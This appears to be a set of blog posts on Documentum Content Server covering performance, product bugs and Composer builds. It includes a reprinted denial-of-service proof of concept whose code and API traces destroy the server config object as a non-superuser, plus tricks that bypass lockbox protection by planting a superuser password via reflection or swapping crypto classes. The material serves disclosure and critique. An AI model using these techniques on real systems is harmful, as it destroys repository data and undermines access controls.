What happens when a smart guy does not sit back

Previously I posted about a performance challenge related to a large number of fetches from a docbase; there I described what makes the SysObjFullFetch RPC command extremely slow – a set of useless SQL queries:

-- determine object type by r_object_id
SELECT dm_dbalias_B.I_TYPE
  FROM DMI_OBJECT_TYPE dm_dbalias_B
 WHERE dm_dbalias_B.R_OBJECT_ID = :dmb_handle
 
-- retrieve data from database
  SELECT *
    FROM TYPE_RV dm_dbalias_B, TYPE_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION
 
-- get identifier of object's ACL (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (dm_dbalias_B.OWNER_NAME = :p00 
    AND dm_dbalias_B.OBJECT_NAME = :p01)
 
-- retrieve object's ACL
  SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION
 
-- check whether the ACL is still up to date (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (    dm_dbalias_B.R_OBJECT_ID = :dmb_objectp
        AND dm_dbalias_B.I_VSTAMP = :dmb_versionp)

Let me clarify why I think so.
This query:

-- get identifier of object's ACL (totally useless)
SELECT dm_dbalias_B.R_OBJECT_ID
  FROM DM_ACL_S dm_dbalias_B
 WHERE (dm_dbalias_B.OWNER_NAME = :p00 
    AND dm_dbalias_B.OBJECT_NAME = :p01)

is completely useless because technically we do not need the r_object_id of the ACL to retrieve the ACL from the database in the follow-up query:

-- retrieve object's ACL
  SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.R_OBJECT_ID = :dmb_handle
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION

so we can replace the two queries with a single one (the owner_name/object_name pair uniquely identifies an ACL):

  SELECT *
    FROM DM_ACL_RV dm_dbalias_B, DM_ACL_SV dm_dbalias_C
   WHERE (    dm_dbalias_C.OWNER_NAME = :p00 
          AND dm_dbalias_C.OBJECT_NAME = :p01
          AND dm_dbalias_C.R_OBJECT_ID = dm_dbalias_B.R_OBJECT_ID)
ORDER BY dm_dbalias_B.R_OBJECT_ID, dm_dbalias_B.I_POSITION

Moreover, in some cases we do not need to check ACLs at all (a sketch of this short-circuit follows the list); these cases are:

  • the current user is a superuser, a member of the dm_browse_all (or dm_read_all, etc.) group, or the sysobject's owner
  • the sysobject has r_is_public=T or world_permit>=2 (2 = BROWSE), and MACL security is turned off
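
A sketch of this short-circuit in DFC terms (illustrative only – this is not the actual Content Server code; the dm_browse_all/dm_read_all membership check and the usual DFC imports are omitted for brevity):

static boolean needsAclCheck(IDfUser user, IDfSysObject obj,
        boolean maclEnabled) throws DfException {
    // superusers and the object's owner bypass ACL evaluation entirely
    if (user.isSuperUser()
            || user.getUserName().equals(obj.getOwnerName())) {
        return false;
    }
    // a public object with world_permit >= 2 (BROWSE) needs no ACL
    // lookup either, as long as MACL security is turned off
    if (!maclEnabled && (obj.isPublic() || obj.getWorldPermit() >= 2)) {
        return false;
    }
    return true; // otherwise the ACL really has to be fetched and evaluated
}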

It took about three months to force EMC to change something in Content Server to improve performance (frankly speaking, EMC employees had no idea about the r_is_public and world_permit attributes), and finally we got the following notice in the patch notes:

Below is a comparison of single-thread performance (number of fetches per 10 seconds) between the old and new implementations for the case when the sysobject has r_is_public=T (I believe the dip in the orange graph is related to GC settings):
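
Such numbers are easy to collect with a trivial single-thread loop – a minimal sketch, assuming session is an already connected IDfSession and id is the r_object_id of a sysobject with r_is_public=T:

IDfPersistentObject obj = session.getObject(new DfId(id));
long deadline = System.currentTimeMillis() + 10000L;
int fetches = 0;
while (System.currentTimeMillis() < deadline) {
    obj.revert(); // drops cached state and re-fetches from Content Server
    fetches++;
}
System.out.println(fetches + " fetches per 10 seconds");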

Developer “PostgreSQL” edition fun

Eighteen months ago EMC released an extremely buggy version of Documentum Content Server intended for development purposes; some ECN members described the situation with it perfectly:

and EMC's reaction to such criticism was extremely eloquent (I do believe that nobody likes criticism, but ignoring real problems says a lot about your respect for customers):

Three weeks ago a new version of the Developer Edition appeared on EMC's FTP server:

What should we expect from the new version?

  • Networking issues are still not resolved (which is weird because I already mentioned a good recipe for that – it must also be accompanied by the following shell scenario:
    cd /etc/udev/rules.d
    # drop the cached NIC-to-MAC bindings so the cloned VM gets fresh ones
    rm -f 70-persistent-net.rules
    rm -f 75-persistent-net-generator.rules
    # neutralize the generator so the rules are not re-created on next boot
    echo "# " > 75-persistent-net-generator.rules

    ):

  • EMC decided to use the weird lockbox feature; a quote from the readme file:

    4. Run dm_crypto_create and dm_crypto_boot utilities to enable Lockbox.
    ------------------------------------------------------------------
    4.1 Execute dm_crypto_create utility as below:
    dm_crypto_create -lockbox lockbox.lb -lockboxpassphrase Password@123 -keyname
    aek.key -passphrase Password@123 -check

    4.2 Run dm_crypto_boot utility as below:
    dm_crypto_boot -all
    Provide the key store passphrase as “Password@123” when prompted.

    i.e. now you will need to run

    dm_crypto_boot -all -lockbox lockbox.lb \
     -lockboxpassphrase Password@123 -passphrase Password@123

    upon every reboot.

  • xPlore still does not work:
  • there is still no reliable installer
  • and the real gem: EMC disclosed their regression tests (check the /opt/Suites directory) – now you can see the real progress of the developer edition 🙂

Q & A. X

Q:

Hi,
I am trying to write a standalone DFC/D2 program. I create a DFC session and then put it into the D2 context via D2Session.initTBO. I then perform normal DFC set/save operations on a sysobject. When I try to apply a D2 configuration like D2AuditConfig.apply I get the below error. How can I correct this?

ERROR 1 – D2 lockbox file or D2Method.passphrase property within it could not be found.
Exception in thread "main" DfException:: THREAD: main; MSG: Impossible to decrypt the method server response; ERRORCODE: ff; NEXT: null
at com.emc.d2.api.methods.D2Method.start(D2Method.java:417)

A:

You have two options:

  • put and set up all the Lockbox stuff on the client side
  • Take advantage of reflection:
    // requires java.lang.reflect.Field and java.util.Map imports
    Field ticketField = D2Session.class.getDeclaredField("s_ticket");
    ticketField.setAccessible(true); // the field is private and static
    Map tickets = (Map) ticketField.get(null);
    tickets.put("docbase_name", "dmadmin_password");
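
    This works because D2Session apparently caches login tickets in its static s_ticket map keyed by docbase name: once a superuser password is planted there, D2 no longer has to contact the lockbox-protected method server to obtain a ticket. The field is private and version-specific, so treat this as a hack rather than an API.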
    

Q:

Also, can't I disable Lockbox altogether in a 7.2 + D2 4.5 environment?

A:

Download the latest (or maybe the next-to-latest) service pack for D2 4.2, extract the com.emc.common.java.crypto.AESCrypto class from C6-Common-4.2.0.jar, and insert it into C6-Common-4.5.0.jar.
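
For completeness, here is a rough sketch of that class transplant in plain Java (normally you would just use the jar or zip CLI tools; the jar locations and the output file name below are assumptions):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import java.util.zip.ZipOutputStream;

public class TransplantAesCrypto {

    // the class being copied from the D2 4.2 jar into the 4.5 jar
    private static final String ENTRY =
            "com/emc/common/java/crypto/AESCrypto.class";

    public static void main(String[] args) throws IOException {
        try (ZipFile source = new ZipFile("C6-Common-4.2.0.jar");
                ZipFile target = new ZipFile("C6-Common-4.5.0.jar");
                ZipOutputStream out = new ZipOutputStream(Files
                        .newOutputStream(Paths.get("C6-Common-4.5.0-patched.jar")))) {
            // copy every entry of the 4.5 jar except the class being replaced
            Enumeration<? extends ZipEntry> entries = target.entries();
            while (entries.hasMoreElements()) {
                ZipEntry entry = entries.nextElement();
                if (ENTRY.equals(entry.getName())) {
                    continue;
                }
                out.putNextEntry(new ZipEntry(entry.getName()));
                copy(target.getInputStream(entry), out);
                out.closeEntry();
            }
            // append the 4.2 implementation of AESCrypto
            out.putNextEntry(new ZipEntry(ENTRY));
            copy(source.getInputStream(source.getEntry(ENTRY)), out);
            out.closeEntry();
        }
    }

    private static void copy(InputStream in, OutputStream out)
            throws IOException {
        byte[] buffer = new byte[8192];
        for (int read; (read = in.read(buffer)) != -1;) {
            out.write(buffer, 0, read);
        }
        in.close();
    }
}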

Have you read the latest ESA?

On August 6 EMC announced six security fixes for Content Server:

Being the author/researcher of the first five vulnerabilities (I believe EMC found the last one in another blog), I will shed light on them very soon; however, I can't understand which CS versions were remediated – it seems that the version numbers were drawn from /dev/random:

Fighting with Composer

More than eight years ago EMC released the first version of a "very promising" application for packaging and deploying Documentum artifacts – Documentum Composer, intended to kill Documentum Application Builder/Installer. Unfortunately, even after eight years this "promising application" is suitable neither for development nor for installation routines. Really, if you try to find some early description of Documentum Composer, for example Introduction to Documentum Composer, you will find that nothing has changed since version 6.0SP1: EMC keeps bumping version numbers, but Composer is still not able to do elementary things. For example, when I try to remove an artifact from a project I get a weird warning:

What the fuck are "other artifacts", and how can I find them? Open my preferred file manager and try to find them manually? What a shame! And how am I supposed to modify XML files manually? Edit them in a text editor (yeah, some folks think that if an application uses XML to store data, it means the application uses an open format)? Bullshit! How can I edit this:

? It seems that EMC coders have never heard about UTF-8 encoding or CDATA sections in XML! The installation process is tedious as well; interesting, has anybody at EMC heard about the java.io.tmpdir system property

or about file names in the ZIP specification:

? I believe the answer is "no". Ultimately, due to the many glitches in this "promising application", all experienced Documentum developers try to minimize the amount of interaction with Documentum Composer. The usage pattern varies from one developer to another; the most common patterns are:

  • don't use Composer at all – developers write a set of API/DQL/dmbasic scripts and store them in a VCS; this approach is extremely straightforward, but it typically requires two sets of scripts: one for clean installation and another for upgrading between application versions
  • use Composer to transfer the application between environments – developers perform changes in the DEV environment using API/DQL/dmbasic scripts, and after that they import Documentum artifacts into Composer

I prefer the second option because maintaining two sets of scripts is too boring. But this approach has a couple of disadvantages:

  • I need to properly set up the Composer workspace on the CI side, i.e. I need to unpack the Composer distribution, create an empty workspace, create an empty dummy project to force Composer to create the "DocumentumCoreProject" (yeah, Composer does not create DocumentumCoreProject automatically when you try to import a project into an empty workspace) and delete the dummy project; after that the build scenario may look like this (extremely error-prone!):
    • Delete composer project from workspace
    • Copy composer project from VCS to workspace
    • Register (import) composer project in workspace
    • Perform some updates in project (like replacing jar files)
    • Build project (or workspace)
  • Sometimes, depending on the target environment, it is required to set the upgrade option (i.e. ignore, version or override) for certain artifacts – "manually" editing and committing the default.dardef file is not an option

There is an interesting fact related to the first problem: Composer does allow importing "external" projects into the workspace:

but the corresponding "emc.importProject" Ant task does not – it requires the project to be copied into the workspace:

In order to resolve both problems mentioned above I developed a simple Eclipse plugin, and now my Ant scenario looks like this:

<?xml version="1.0"?>
<project name="composer" default="all">

  <property file="${basedir}/src/main/resources/build.properties"/>

  <taskdef name="ap.importProject" classname="tel.panfilov.documentum.composer.ImportProjectAntTask"/>
  <taskdef name="ap.setUpgradeOption" classname="tel.panfilov.documentum.composer.SetUpgradeOptionAntTask"/>

  <target name="create-workspace" description="Create composer workspace">
    <ap.importProject project="<project name>" location="${composer.project.dir}"/>
    <ap.setUpgradeOption project="<project name>">
       <upgradeOptions>
          <artifact name="*" category="com.emc.ide.artifact.bpm.processContainer" value="IGNORE"/>
          <artifact name="wt_executing" category="com.emc.ide.artifact.bpm.processContainer" value="VERSION"/>
       </upgradeOptions>
    </ap.setUpgradeOption>
  </target>

  <target name="build-workspace" description="build eclipse project">
    <eclipse.incrementalBuild kind="full"/>
  </target>

  <target name="clean-workspace" description="clean eclipse project">
    <eclipse.incrementalBuild kind="clean"/>
  </target>

  <target name="all" depends="create-workspace, clean-workspace, build-workspace"/>

</project>
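
Note that the eclipse.incrementalBuild task only exists when the script is executed inside Eclipse, so the CI job has to run this build through the headless org.eclipse.ant.core.antRunner application shipped with the Composer distribution rather than through a standalone Ant installation.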

Trap for negligent developer

Do you remember my last quote: "if you blindly apply everything that is written here without further research you are a bloody idiot"? It seems that EMC coders got caught in this stupid trap again. Half a year ago I published a couple of posts about denial of service in Content Server and demonstrated how denial of service could evolve into privilege elevation; here are those posts: Is it possible to compromise Documentum by deleting object? Part I, Is it possible to compromise Documentum by deleting object? Typical mistakes and Is it possible to compromise Documentum by deleting object? Solution. Let's revisit the DoS PoC, here it is:

import java.util.LinkedHashSet;
import java.util.Set;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfPersistentObject;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfUser;
// TypeMechanics is an internal (non-public-API) DFC class; package assumed
import com.documentum.fc.client.TypeMechanics;
import com.documentum.fc.common.DfException;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;

/**
 * @author Andrey B. Panfilov <andrew@panfilov.tel>
 */
public class Test {
 
    public static void main(String[] argv) throws Exception {
        String docbase = argv[0];
        String userName = argv[1];
        String password = argv[2];
        IDfSession session = null;
        try {
            session = new DfClient().newSession(docbase, new DfLoginInfo(
                    userName, password));
 
            IDfUser user = session.getUser(null);
 
            if (user.isSuperUser() || user.isSystemAdmin()) {
                System.out.println("User " + userName
                        + " has too wide privileges, choose different one");
                System.exit(0);
            }
 
            Set<String> saveMethods = new LinkedHashSet<String>();
            for (Object o : TypeMechanics.getAllInstances()) {
                saveMethods.add(((TypeMechanics) o).getExpungeMethod());
            }
            for (String method : saveMethods) {
                System.out.println(method + "\tis "
                        + (checkDmServerConfig(session, method) ? "" : "not ")
                        + "vulnerable for dm_server_config objects");
            }
        } finally {
            if (session != null) {
                session.disconnect();
            }
        }
    }
 
    public static Boolean checkDmServerConfig(IDfSession session, String method)
        throws DfException {
        try {
            session.beginTrans();
            IDfPersistentObject object = (IDfPersistentObject) session
                    .getServerConfig();
            object.revert();
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                "i_vstamp", });
            IDfList types = new DfList(new String[] {"S", "I", });
            IDfList values = new DfList(
                    new String[] {object.getType().getName(),
                        String.valueOf(object.getVStamp()), });
            try {
                session.apply(object.getObjectId().getId(), method, params,
                        types, values);
            } catch (DfException ex) {
                return false;
            }
            try {
                object.revert();
            } catch (DfException ex) {
                return true;
            }
            return false;
        } catch (DfException ex) {
            return false;
        } finally {
            session.abortTrans();
        }
    }
 
}

What makes this code smelly? I believe this code smells a lot, but one thing makes it terribly smelly – the exception handling:

            try {
                session.apply(object.getObjectId().getId(), method, params,
                        types, values);
            } catch (DfException ex) {
                return false;
            }

There is a special cauldron in Hell for programmers who handle exceptions like me. Let's check a couple of commands manually…

Connected to Documentum Server running Release 7.2.0020.0177  Linux64.Oracle
Session id is s0
API> begintran,c,
...
OK
API> retrieve,c,dm_server_config where object_name='TEST'
...
3d024be980000102
API> apply,c,3d024be980000102,dmScopeConfigExpunge
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DATA_DICT_E_SCOPE_CONFIG_CANT_FETCH]error:  
     "Cannot fetch - Invalid object ID '3d024be980000102'."

[DM_OBJ_MGR_E_FETCH_BAD_TYPE]error:  
     "attempt to create object of type  failed because type did not exist"


API> revert,c,3d024be980000102
...
OK
API> apply,c,3d024be980000102,dmDisplayConfigExpunge
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DATA_DICT_E_DISPLAY_CONFIG_CANT_FETCH]error:  
       "Cannot fetch - Invalid object ID '3d024be980000102'."

[DM_OBJ_MGR_E_FETCH_BAD_TYPE]error:  
        "attempt to create object of type  failed because type did not exist"


API> revert,c,3d024be980000102
...
OK

Keep going…

API> apply,c,3d024be980000102,DROP_STAMP
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_OBJ_MGR_E_DELETE_MISMATCH]error:  
     "version mismatch on delete of object 3d024be980000102: version supplied was 0"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
      "attempt to fetch object with handle 3d024be980000102 failed"


API> revert,c,3d024be980000102
...
[DM_API_E_EXIST]error:  
      "Document/object specified by 3d024be980000102 does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
      "Cannot fetch a sysobject - Invalid object ID : 3d024be980000102"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
      "attempt to fetch object with handle 3d024be980000102 failed"

WTF? Continuing…

API> apply,c,3d024be980000102,DROP_DUMP
...
q0
API> ?,c,q0
result
------------
F
(1 row affected)
[DM_DUMP_E_OPEN_TRANSACTION]error:  
      "The destroy Dump operation cannot be executed while 
      inside of a user transaction."

API> abort,c
...
OK
API> apply,c,3d024be980000102,DROP_DUMP
...
q0
API> ?,c,q0
result
------------
T
(1 row affected)

API> revert,c,3d024be980000102
...
[DM_API_E_EXIST]error:  
      "Document/object specified by 3d024be980000102 does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
      "Cannot fetch a sysobject - Invalid object ID : 3d024be980000102"

LOL 🙂
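
The moral for the PoC above: an exception thrown by apply proves nothing – as the traces show, a command may fail loudly and still destroy the object (DROP_STAMP), or fail inside a transaction but succeed outside of one (DROP_DUMP). The only reliable probe is whether the object can still be fetched afterwards; a corrected check could look like this (a sketch along the lines of checkDmServerConfig above):

public static boolean isDestructive(IDfSession session,
        IDfPersistentObject object, String method, IDfList params,
        IDfList types, IDfList values) {
    try {
        session.apply(object.getObjectId().getId(), method, params,
                types, values);
    } catch (DfException ignored) {
        // do not conclude anything here: verify the object state below
    }
    try {
        object.revert(); // still fetchable, so the command was harmless
        return false;
    } catch (DfException gone) {
        return true; // the object is gone, the command is destructive
    }
}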

DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE

It seems that Content Server 7.2 has acquired a weird new behavior – now if you perform create/update/delete operations on dm_folder objects in a transaction, you may get one of the DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE, DM_FOLDER_E_CONCUR_UNLINK_OPERATION_FAILURE or DM_FOLDER_E_CONCUR_RENAME_OPERATION_FAILURE errors:

--
-- Session #1
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000a900
API> set,c,l,object_name
SET> folder 1
...
OK
API> save,c,l
...
OK

--
-- Session #2
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000a90b
API> set,c,l,object_name
SET> folder 2
...
OK
API> save,c,l
...
-- 10 sec timeout
[DM_FOLDER_E_CONCUR_LINK_OPERATION_FAILURE]error:  
      "Cannot perfrom the link operation on folder (0b024be98000a90b), 
      as some concurrent operation is being performed on the folder or 
      decendant folder or ancesstor folder with folder id 0c024be980000105."


API> commit,c,
...
[DM_SESSION_E_TRANSACTION_ERROR]error:  
      "Transaction invalid due to errors, please abort transaction."

It seems that the new behavior originates from the following bugs/CRs addressed in 7.2 (check the release notes):

Issue Number  Description
CS-46175      r_link_cnt on folder is not showing the correct numbers of objects held by the folder.
CS-40838      When two users perform a move operation of two folders simultaneously, the r_folder_path and i_ancestor_id parameters contain incorrect values causing folder inconsistencies in Oracle and SQL Server. Workaround: Add disable_folder_synchronization = T in the server.ini file. By default, the value is F.

The interesting thing here is the fact that the new behavior has nothing to do with consistency – EMC developers are not familiar with the common double-checked locking pattern:

  if (condition) {             // cheap check without holding the lock
      synchronized (lock) {    // acquire the lock
          if (condition) {     // re-check now that we hold the lock
              // do work
          }
      }                        // the lock is released here
  }

and make mistakes that even junior developers do not make:

--
-- Session #1
--
API> create,c,dm_folder
...
0b024be98000c2dc
API> set,c,l,object_name
SET> test_folder
...
OK
API> link,c,l,/dmadmin
...
OK
API> link,c,l,/Temp
...
OK
API> link,c,l,/System
...
OK
API> save,c,l
...
OK

--
-- Session #2
--
API> begintran,c,
...
OK
API> create,c,dm_folder
...
0b024be98000c2e8
API> set,c,l,object_name
SET> f1
...
OK
API> link,c,l,/dmadmin/test_folder
...
OK
API> save,c,l
...
OK

--
-- Session #1
--
API> destroy,c,l
... waiting

--
-- Session #2
--
API> commit,c,
...
OK

--
-- Session #1
-- 
OK

--
-- Session #2
-- here we get a zombie folder
--
API> get,c,0b024be98000c2e8,r_folder_path[0]
...
/dmadmin/test_folder/f1
API> retrieve,c,dm_folder where any r_folder_path='/dmadmin/test_folder'
...
[DM_API_E_NO_MATCH]error:  
    "There was no match in the docbase for the qualification: 
    dm_folder where any r_folder_path='/dmadmin/test_folder'"

What a shame!